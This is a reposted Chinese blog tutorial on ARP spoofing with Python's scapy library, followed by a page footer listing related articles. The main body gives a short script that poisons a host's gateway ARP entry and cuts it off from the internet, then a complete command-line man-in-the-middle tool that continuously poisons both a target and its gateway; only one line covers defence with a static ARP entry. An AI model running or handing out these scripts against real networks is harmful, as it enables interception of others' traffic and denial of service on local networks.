Python scapy 实现一个简易 arp 攻击脚本

最新推荐文章于 2024-05-20 20:26:39 发布
最新推荐文章于 2024-05-20 20:26:39 发布
阅读量111 收藏
点赞数
文章标签: python 操作系统
原文链接:http://www.cnblogs.com/wanghuaijun/p/7210703.html
版权
原文链接: http://www.jianshu.com/p/df5918069612
scapy 是 python 写的一个功能强大的交互式数据包处理程序,可用来发送、嗅探、解析和伪造网络数据包,常常被用到网络攻击和测试中。 —— 由 方石剑分享

scapy是python写的一个功能强大的交互式数据包处理程序,可用来发送、嗅探、解析和伪造网络数据包,常常被用到网络攻击和测试中。

scapy的安装在Linux非常便利,但在Windows下比较复杂。

以下假定读者使用的是Ubuntu Linux 和 Python 3 环境。

scapy的安装在Linux下非常便利,在终端下执行以下命令即可完成安装:

sudo pip3 install scapy-python3

以下是一个非常简单的arp攻击演示脚本,该脚本可以在实验环境下帮助你理解arp协议的作用和原理,当然你甚至可以扩充该脚本去编写一个完整的arp攻击工具。

#!/usr/bin/python3
# -*- coding: utf-8 -*-
# ARP攻击演示脚本/arpDemo.py


from scapy.all import ( Ether, ARP, sendp ) # 注意这里面的几个方法 # Ether用来构建以太网数据包 # ARP是构建ARP数据包的类 # sendp方法在第二层发送数据包 # Ether用来构建以太网数据包 eth = Ether() arp = ARP( # 代表ARP请求或者响应 op="is-at", # 发送方Mac地址/毒化记录中的MAC hwsrc="08:00:27:97:d1:f5", # 发送方IP地址/毒化记录中的IP psrc="192.168.31.1", # 目标Mac地址/被欺骗主机MAC hwdst="2C:56:DC:D3:AB:DB", # 目标IP地址/被欺骗主机IP地址 pdst="192.168.31.248" # 意思就是告诉192.168.31.248这个地址的主机,IP为192.168.31.100的主机MAC地址是08:00:27:97:d1:f5 # 如果不写目标主机的IP和MAC则默认以广播的形式发送 ) # scapy重载了"/"操作符,可以用来表示两个协议层的组合 # 这里我们输出一下数据包的结构信息 print((eth/arp).show()) # 发送封包,并且每间隔1秒重复发送 sendp(eth/arp, inter=2, loop=1)

攻击前我们在主机上看一下arp缓存的记录

arp -a

攻击前的arp缓存记录

执行脚本:

sudo python3 arpDemo.py

攻击后的arp缓存记录

这里我们是对主机的网关记录进行篡改,在执行了攻击脚本后主机已经无法正常访问互联网了。

如果你要防范这种攻击也很简单,直接将IP和MAC地址的关系绑定写入arp缓存即可。
在windows你可以通过arp命令完成,Linux下与此操作相似。

#添加静态项
arp -s 192.168.31.1 64-09-80-04-aa-c3

下面是一个更加复杂的中间人攻击脚本范例
你可以进一步的去完善它

#!/usr/bin/python3
# -*- coding: utf-8 -*-
'''
ARP 攻击脚本
'''

import argparse import threading import time from scapy.all import ARP, Ether, get_if_hwaddr, sendp from scapy.layers.l2 import getmacbyip # 注意这里面的几个方法 # Ether用来构建以太网数据包 # ARP是构建ARP数据包的类 # sendp方法在第二层发送数据包 # getmacbyip方法用于通过ip获取mac地址 # get_if_hwaddr方法获取指定网卡的mac地址 def get_mac(tgt_ip): ''' 调用scapy的getmacbyip函数,获取攻击目标IP的MAC地址。 ''' tgt_mac = getmacbyip(tgt_ip) if tgt_mac is not None: return tgt_mac else: print("无法获取IP为:%s 主机的MAC地址,请检查目标IP是否存活"%tgt_ip) def create_arp_station(src_mac, tgt_mac, gateway_ip, tgt_ip): ''' 生成ARP数据包,伪造网关欺骗目标计算机 src_mac:本机的MAC地址,充当中间人 tgt_mac:目标计算机的MAC gateway_ip:网关的IP,将发往网关的数据指向本机(中间人),形成ARP攻击 tgt_ip:目标计算机的IP op=is-at,表示ARP响应 ''' eth = Ether(src=src_mac, dst=tgt_mac) arp = ARP(hwsrc=src_mac, psrc=gateway_ip, hwdst=tgt_mac, pdst=tgt_ip, op="is-at") pkt = eth / arp return pkt def create_arp_gateway(src_mac, gateway_mac, tgt_ip, gateway_ip): ''' 生成ARP数据包,伪造目标计算机欺骗网关 src_mac:本机的MAC地址,充当中间人 gateway_mac:网关的MAC tgt_ip:目标计算机的IP,将网关发往目标计算机的数据指向本机(中间人),形成ARP攻击 gateway_ip:网关的IP op=is-at,表示ARP响应 ''' eth = Ether(src=src_mac, dst=gateway_mac) arp = ARP(hwsrc=src_mac, psrc=tgt_ip, hwdst=gateway_mac, pdst=gateway_ip, op="is-at") pkt = eth / arp return pkt def main(): """ 主方法 """ description = "ARP攻击脚本" parser = argparse.ArgumentParser(description=description) parser.add_argument('-sm', dest='srcmac', type=str, help='发送源计算机的MAC,如果不提供,默认将采用本机的MAC地址') parser.add_argument('-t', dest='targetip', type=str, help='指定目标计算机IP', required=True) parser.add_argument('-tm', dest='targetmac', type=str, help='指定目标计算机MAC,如果不提供,默认将根据其IP获取MAC地址') parser.add_argument('-g', dest='gatewayip', type=str, help='指定网关IP', required=True) parser.add_argument('-gm', dest='gatewaymac', type=str, help='指定网关MAC,如果不提供,默认将根据其IP获取MAC地址') parser.add_argument('-i', dest='interface', type=str, help='指定使用的网卡', required=True) parser.add_argument('-a', dest='allarp', action='store_true', help='是否进行全网arp欺骗') args = parser.parse_args() tgt_ip = args.targetip gateway_ip = args.gatewayip interface = args.interface srcmac = args.srcmac targetmac = args.targetmac gatewaymac = args.gatewaymac if tgt_ip is None or gateway_ip is None or interface is None: print(parser.print_help()) exit(0) src_mac = srcmac if src_mac is None: src_mac = get_if_hwaddr(interface) print('本机MAC地址是:', src_mac) print("目标计算机IP地址是:", tgt_ip) tgt_mac = targetmac if tgt_mac is None: tgt_mac = get_mac(tgt_ip) print("目标计算机MAC地址是:", tgt_mac) print("网关IP地址是:", gateway_ip) gateway_mac = gatewaymac if gateway_mac is None: gateway_mac = get_mac(gateway_ip) print("网关MAC地址是:", gateway_mac) input('按任意键继续:') pkt_station = create_arp_station(src_mac, tgt_mac, gateway_ip, tgt_ip) pkt_gateway = create_arp_gateway(src_mac, gateway_mac, tgt_ip, gateway_ip) # 如果不展示发送情况的话下面的语句可以更加简便直接用sendp方法提供的功能循环发送即可,不需要多线程和死循环。 # sendp(pkt_station, inter=1, loop=1) # sendp(pkt_gateway, inter=1, loop=1) i = 1 while True: t = threading.Thread( target=sendp, args=(pkt_station,), kwargs={'inter':1, 'iface':interface} ) t.start() t.join() print(str(i) + " [*]发送一个计算机ARP欺骗包") s = threading.Thread( target=sendp, args=(pkt_gateway,), kwargs={'inter':1, 'iface':interface} ) s.start() s.join() print(str(i) + " [*]发送一个网关ARP欺骗包") i += 1 time.sleep(1) if __name__ == '__main__': main()

转载于:https://www.cnblogs.com/wanghuaijun/p/7210703.html

weixin_30691871
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Python中使用scapy模拟数据包实现arp攻击、dns放大攻击例子
12-23
scapypython写的一个功能强大的交互式数据包处理程序,可用来发送、嗅探、解析和伪造网络数据包,常常被用到网络攻击和测试中。 这里就直接用pythonscapy搞。 这里是arp攻击方式,你可以做成arp攻击。 复制代码 代码如下: #!/usr/bin/python “”” ARP attack “”” import sys, os from scapy.all import * if os.geteuid() != 0:     print “This program must be run as root. Aborting.”     sys.exit() if len(s
python写的ARP攻击代码实例
01-20
注:使用这个脚本需要安装scapy 包最好在linux平台下使用,因为scapy包在windows上安装老是会有各种问题 复制代码 代码如下:#coding:utf-8#example :sudo python arp_dos.py 192.168.1.103 from scapy.all import ...
ARP协议详解及如何编程实现ARP攻击
Zfrong繁荣的IT技术、IT项目、解决方案专栏Blog-上海
11-07 1311
一.             关于ARP协议的基础知识1.ARP的工作原理本来我不想在此重复那些遍地都是的关于ARP的基本常识,但是为了保持文章的完整性以及照顾初学者,我就再啰嗦一些文字吧,资深读者可以直接跳过此节。 我们都知道以太网设备比如网卡都有自己全球唯一的MAC地址,它们是以MAC地址来传输以太网数据包的,但是它们却识别不了我们IP包中的IP地址,所以我们在以太网中进行
python攻击脚本实例-一键黑客工具:一个Python脚本搞定所有攻击操作
weixin_39745724的博客
11-11 3278
近期出现了可综合利用Shodan设备搜索引擎和Metasploit渗透测试工具的Python代码。该代码会用Shodan.io自动搜索有漏洞的在线设备,随后使用Metasploit的漏洞利用数据库劫持计算机和其他在线设备。只需点击运行,该脚本就会爬取互联网,寻找可以攻击的脆弱主机(通常是因为没打补丁),并自动取得对这些主机的控制权。完全无需什么高端的黑客技术。本文福利:私信回复【PDF】可获取Py...
python网站攻击脚本_Python scapy 实现一个简易 arp 攻击脚本
weixin_39832448的博客
11-26 729
scapypython写的一个功能强大的交互式数据包处理程序,可用来发送、嗅探、解析和伪造网络数据包,常常被用到网络攻击和测试中。scapy的安装在Linux非常便利,但在Windows下比较复杂。以下假定读者使用的是Ubuntu Linux 和 Python 3 环境。scapy的安装在Linux下非常便利,在终端下执行以下命令即可完成安装:sudo pip3 install scapy-py...
scapy-MITM:使用Scapy进行ARP毒化的小型python脚本,并使用iptables进行IPTM重定向以进行MITM攻击。 用于https
05-02
替补使用Scapy的小型python脚本使用Linux内置的Iptables进行ARP中毒和IP地址重定向,以执行MITM攻击。 目前,它的测试很有限,这意味着当心它不起作用。 另外,这会弄乱您的Iptable配置的规则,因此,如果您关心这种...
Scapy_库_ARP_Scanner
07-27
Scapy(Ether、ARP、srp1模块介绍)、Scanner脚本编写[ARP数据包的构造]
Wireless-Lagswitch:使用Python,它是ARP缓存中毒和MITM工具的集合
03-04
在basic文件夹中,有一种方法可以简单地将ARP缓存毒化PS4 20秒钟,然后恢复ARP状态。 该脚本应该可以跨平台运行,并且已确认该脚本适用于Linux和rooted Android设备(正在运行Termux)。 信息技术部 额外要求 sudo
infosec-scripts:一些InfoSec脚本
03-03
信息脚本一些InfoSec脚本ARP_Network_Scanner.py 通过ARP请求(使用Scapy软件包)在本地网络中扫描活动主机。ARP_Spoof.py 通过伪造的ARP响应欺骗受害者的ARP缓存(使用Scapy软件包)。 为欺骗提供目标(通过IP或MAC...
ARP(发包器)arp_sender
05-19
只支持Linux系统,如果软件有问题或者需要更多的功能,请私信我。 使用方法: ./arp_sender -h 可以查看帮助,很简单一看就会。 使用方法举例: ./arp_sender -i 172.16.1.66 -p ens160 -i :后面跟要发送的目标IP -p :后面跟Linux接口标签
ARP欺骗工具源码(2015毕业设计)
08-18
环境 vs2010 pcap库,2015毕业设计,只有源码,文档评论向我索要 解压密码 :20150818arp
python 使用scapy库进行ARP欺骗
Jeanphorn的专栏
05-14 1万+
1. 说明  ARP欺骗(ARP spoofing),又称ARP病毒(ARP poisoning)或ARP攻击,是针对以太网地址解析协议(ARP)的一种攻击技术。此种攻击可让攻击者获取局域网上的数据包甚至可篡改数据包,且可让网络上特定电脑或所有电脑无法正常连接。最早探讨ARP欺骗的文章是由Yuri Volobue所写的《ARP与ICMP转向游戏》(ARP and ICMP redirection g
Python scapy实现一个简易arp攻击脚本
lihui的服务器技术博客
08-10 4947
Pip3 安装: apt-get install python3-pip scapypython写的一个功能强大的交互式数据包处理程序,可用来发送、嗅探、解析和伪造网络数据包,常常被用到网络攻击和测试中。 scapy的安装在Linux非常便利,但在Windows下比较复杂。 以下假定读者使用的是Ubuntu Linux 和 Python 3 环境。 scapy的安装在Linux下非常...
Python协议攻击脚本(一): Scapy的使用
酉酉的博客
04-24 4437
文章目录简介安装LinuxMacWindows使用交互式Python中调用 简介 Scapy官网 Scapy官方文档 Scapy是一个Python程序,使用户能够发送,嗅探和剖析并伪造网络数据包。此功能允许构建可以探测,扫描或攻击网络的工具。Scapy可以轻松处理大多数经典任务,如扫描,跟踪路由,探测,单元测试,攻击或网络发现。它可以取代hping,arpspoof,arp-sk,arping,...
pythonarp攻击_python通过scapy模块进行arp断网攻击
weixin_39811386的博客
11-22 298
前言:想实现arpsoof一样的工具arp断网攻击原理:通过伪造IP地址与MAC地址实现ARP欺骗,在网络发送大量ARP通信量。攻击者只要持续不断发送arp包就能造成中间人攻击或者断网攻击。0x01:准备工作Linux环境下:(windows环境下各种错误,其中有个错误是缺少windows.dll至今无法解决)有scapy模块如果没有进行安装py2安装方法pip install scapypy3...
PYTHON编程之基于scapy的DHCP全自动攻击脚本
热门推荐
单核CPU的小朋友的博客
11-07 4万+
DHCP服务 当一个组织分配到一个网络地址块后们就可以为该组织内的主机继而路由器接口分配IP地址了。这个工作可以由网络管理员手动分配,也可以通过动态主机配置协议,也就是我们这里所讲的DHCP协议来动态的为主机分配地址。事实上很多的实际网络都是通过DHCP来实现地址分配的。 DHCP在应用层实现,传输层使用的时UDP,提供动态IP地址分配网络的,需要运行DHCP服务器(端口号67)并且需要配置可以为...
使用Python scapy构造tcp三次握手,遭遇系统发送rst包解决方法
weixin_44704374的博客
12-11 2633
使用Python scapy构造tcp三次握手,遭遇系统发送rst包解决方法 在使用Pyhon scapy库构造TCP时,遭遇到系统底层发送的rst包,导致三次握手无法建立情况。 在网上找了很多解决方案,linux相对好解决,直接使用 iptables -A OUTPUT -p tcp --tcp-flags RST RST -j DROP 可以干掉系统rst包干扰。 但在windows系统下,...
【hackmyvm】Slowman靶机
最新发布
woshicainiao666的博客
05-20 622
发现/secretLOGIN/login.html为登录地址,根据账号密码登录发现一个zip,但是需要密码。在FTP中得到的账号,爆破一下SSH。上传linpeas.sh文件,报一下。SSH爆破无果,试试mysql。得到用户名和加密的密码。
python scapy实现tcp握手测试
08-10
使用PythonScapy库可以方便地实现TCP握手测试。下面是一个简单的示例代码: ```python from scapy.all import * # 目标IP地址和端口号 target_ip = "192.168.0.1" target_port = 80 # 构造SYN包 syn_packet = ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值